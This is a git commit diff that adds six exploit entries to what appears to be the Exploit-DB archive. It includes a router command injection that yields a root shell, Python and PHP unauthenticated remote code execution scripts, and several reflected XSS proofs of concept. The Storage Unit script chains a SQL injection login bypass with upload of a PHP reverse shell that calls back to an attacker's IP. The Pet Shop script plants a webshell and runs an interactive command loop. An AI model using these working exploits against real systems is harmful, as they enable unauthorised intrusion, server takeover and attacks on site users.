DB: 2021-09-30

6 changes to exploits/shellcodes Mitrastar GPT-2541GNAC-N1 - Privilege escalation Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS) OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS) Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
2021-09-30 05:02:08 +00:00 · 2021-09-30 05:02:08 +00:00 · 68d01808ce
commit 68d01808ce
parent d2b0bf596b
7 changed files with 240 additions and 0 deletions
--- a/exploits/hardware/remote/50351.txt
+++ b/exploits/hardware/remote/50351.txt
@ -0,0 +1,23 @@
+# Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation
+# Date: 10-08-2021
+# Exploit Author: Leonardo Nicolas Servalli
+# Vendor Homepage: www.mitrastar.com
+# Platform: Mistrastar router devices GPT-2541GNAC-N1 (HGU)
+# Tested on: Firmware BR_g3.5_100VNZ0b33
+# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-MitraStar/blob/main/README.md
+
+Description:
+
+----------
+
+# Mitrastar GPT-2541GNAC-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials).
+
+# The command “deviceinfo show file <path>” is used from reduced CLI to show files and directories. Because this command do not handle correctly special characters, is possible to insert a second command as a parameter on the <path> value. By using “&&/bin/bash” as parameter value we can spawn a bash console, as seen on the next example:
+
+
+Exploit:
+--------
+
+> deviceinfo show file &&/bin/bash
+
+# This command will spawn a full interoperable bash console with root privileges.
--- a/exploits/php/webapps/50348.py
+++ b/exploits/php/webapps/50348.py
@ -0,0 +1,70 @@
+# Exploit Title: Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 28.09.2021
+# Exploit Author: Fikrat Ghuliev (Ghuliev)
+# Vendor Homepage: https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14932&title=Storage+Unit+Rental+Management+System+using+PHP+Free+Source+Code
+# Version: 1
+# Tested on: Ubuntu
+
+import requests
+from bs4 import BeautifulSoup
+import sys
+import random
+import string
+import time
+
+if len(sys.argv) != 4:
+    print("[~] Usage : python3 exploit.py localhost ip port")
+    exit()
+
+site = sys.argv[1]
+ip = sys.argv[2]
+port = sys.argv[3]
+shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>"
+
+letters = string.ascii_lowercase
+name = ''.join(random.choice(letters) for i in range(5))
+
+def LoginAndShellUpload():
+    login = 'http://'+site+':80/storage/classes/Login.php?f=login'
+    session = requests.session()
+    post_data = {"username": "' OR 1=1-- -", "password": "aa"}
+    user_login = session.post(login, data=post_data)
+    cookie = session.cookies.get_dict()
+
+    print('[+]Success login')
+    print('[+]Try Shell upload')
+    time.sleep(2)
+    #shell upload
+    url = 'http://'+site+':80/storage/classes/SystemSettings.php?f=update_settings'
+    cookies = cookie
+    headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------246884504016047375913085888751", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/storage/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
+    data = "-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nStorage Unit Rental Management System - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nSURMS - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"cover\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------246884504016047375913085888751--\r\n"
+    requests.post(url, headers=headers, cookies=cookies, data=data)
+    print('[+]Success!')
+    print('[+]Getting reverse shell')
+    time.sleep(2)
+
+
+def RCE():
+
+    path = 'http://'+site+'/storage/uploads/'
+    html_text = requests.get(path).text
+    soup = BeautifulSoup(html_text, 'html.parser')
+    for link in soup.find_all('a'):
+        data = link.get('href')
+        with open('shell_location.txt', 'w') as f:
+            f.write(data)
+
+    path2 = 'shell_location.txt'
+    shell_file = open(path2,'r')
+    shell = shell_file.readline()
+
+    r = requests.get('http://'+site+'/storage/uploads/'+shell)
+    print(r.text)
+    print('[+]Hacked!')
+
+
+
+LoginAndShellUpload()
+RCE()
--- a/exploits/php/webapps/50349.txt
+++ b/exploits/php/webapps/50349.txt
@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)
+# Date: 2/15/2021
+# Author: 0xB9
+# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip
+# Version: 1.3.1
+# Tested on: Windows 10
+# CVE: CVE-2021-24287
+
+1. Description:
+The tab parameter in the Admin Panel is vulnerable to XSS.
+
+2. Proof of Concept:
+wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
--- a/exploits/php/webapps/50350.txt
+++ b/exploits/php/webapps/50350.txt
@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
+# Date: 2/3/2021
+# Author: 0xB9
+# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
+# Version: 1.3.0
+# Tested on: Windows 10
+# CVE: CVE-2021-24286
+
+1. Description:
+This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.
+
+2. Proof of Concept:
+wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
--- a/exploits/php/webapps/50352.txt
+++ b/exploits/php/webapps/50352.txt
@ -0,0 +1,22 @@
+# Exploit Title: OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)
+# Date: 9/24/2021
+# Exploit Author: Eric Salario
+# Vendor Homepage: http://www.os4ed.com/
+# Software Link: https://opensis.com/download
+# Version: 8.0
+# Tested on: Windows, Linux
+# CVE : CVE-2021-40310
+
+OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter.
+
+1. Login as "teacher".
+
+2. Navigate to (take attendance): http://demo.opensis.com/ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true
+
+Decoded request:
+
+GET /ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7 onmouseover=alert(document.domain) style=position:absolute;width:100%;height:100%;top:0;left:0; z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true HTTP/1.1
+
+3. XSS triggers
+
+PoC Video: https://www.youtube.com/watch?v=aPKPUDmmYpc
--- a/exploits/php/webapps/50353.php
+++ b/exploits/php/webapps/50353.php
@ -0,0 +1,93 @@
+# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 28.09.2021
+# Author: Mr.Gedik
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html
+# Version: 1.0
+# https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB
+
+
+Vulnerable code controllers/add_petmanagement.php
+Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"],
+$_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" .
+addslashes($_FILES["images"]["name"]));
+
+Exploit
+#############
+
+<?php
+/*
+@author:mrgedik
+*/
+function anim($msg, $time)
+{
+    $msg = str_split($msg);
+    foreach ($msg as $ms) {
+        echo $ms;
+        usleep($time);
+    }
+}
+
+anim("__  __       _____          _ _ _
+|  \/  |     / ____|        | (_) |
+| \  / |_ __| |  __  ___  __| |_| | __
+| |\/| | '__| | |_ |/ _ \/ _` | | |/ /
+| |  | | |_ | |__| |  __/ (_| | |   <
+|_|  |_|_(_) \_____|\___|\__,_|_|_|\_\
+", 900);
+
+echo PHP_EOL;
+while(1)
+{
+    echo anim("Target (http://example.com/path/): ", 800);
+    $target = trim(fgets(STDIN));
+    echo PHP_EOL;
+    if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {
+        echo "Not a valid URL".PHP_EOL;
+    }else {
+        break;
+    }
+}
+@unlink("exp.php");
+$fw = fopen("exp.php","a+");
+fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>');
+fclose($fw);
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");
+$fields = [
+    'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')
+];
+curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
+
+
+$response = curl_exec($ch);
+@unlink("exp.php");
+
+if(strstr($response,"success"))
+{
+    while(1)
+    {
+        echo anim("root@pwn: ", 800);
+        $command = trim(fgets(STDIN));
+        if($command == trim("exit"))
+        {
+            exit;
+        }
+        $ch = curl_init();
+        curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");
+        curl_setopt($ch, CURLOPT_POST, 1);
+        curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));
+        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+        echo curl_exec($ch);
+        curl_close ($ch);
+    }
+}else
+{
+    echo anim("Fail", 800);
+}
+
+
+?>
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -18540,6 +18540,7 @@ id,file,description,date,author,type,platform,port
 50282,exploits/hardware/remote/50282.txt,"ECOA Building Automation System - Hard-coded Credentials SSH Access",1970-01-01,Neurogenesia,remote,hardware,
 50335,exploits/hardware/remote/50335.py,"Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers",1970-01-01,"Michael Alamoot",remote,hardware,
 50347,exploits/linux/remote/50347.py,"Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)",1970-01-01,shinris3n,remote,linux,
+50351,exploits/hardware/remote/50351.txt,"Mitrastar GPT-2541GNAC-N1 - Privilege escalation",1970-01-01,"Leonardo Nicolas Servalli",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44463,3 +44464,8 @@ id,file,description,date,author,type,platform,port
 50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
+50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
+50349,exploits/php/webapps/50349.txt,"WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
+50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
+50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php,
+50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php,